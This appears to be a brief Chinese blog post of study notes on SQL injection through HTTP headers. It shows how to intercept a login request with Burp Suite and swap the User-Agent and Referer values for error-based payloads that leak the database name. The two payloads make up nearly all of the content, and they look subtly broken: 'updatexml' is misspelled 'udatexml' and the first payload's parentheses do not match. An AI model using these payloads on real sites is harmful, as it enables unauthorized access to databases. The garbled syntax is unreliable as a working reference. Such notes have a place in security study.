post 报头注入

1、user-agent 注入:
使用情况:万能密码无法绕过安全验证,用户名无法注入,通过查看源代码分析执行的动作。

bp抓包修改user_agent的数据如下
User-Agent: ' or udatexml(1,concat('#',(select database(),0),'','')#

2、referer 注入:
用bp抓包,修改referer的数据:
Referer:' or udatexml(1,concat('#',(select database()),0),'','')#

本文作者:ugnfc

本文链接:https://www.cnblogs.com/ugnfc/p/18156881

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   ugnfc  阅读(12)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
💬
评论
📌
收藏
💗
关注
👍
推荐
🚀
回顶
收起
  1. 1 404 not found REOL
404 not found - REOL
00:00 / 00:00
An audio error has occurred.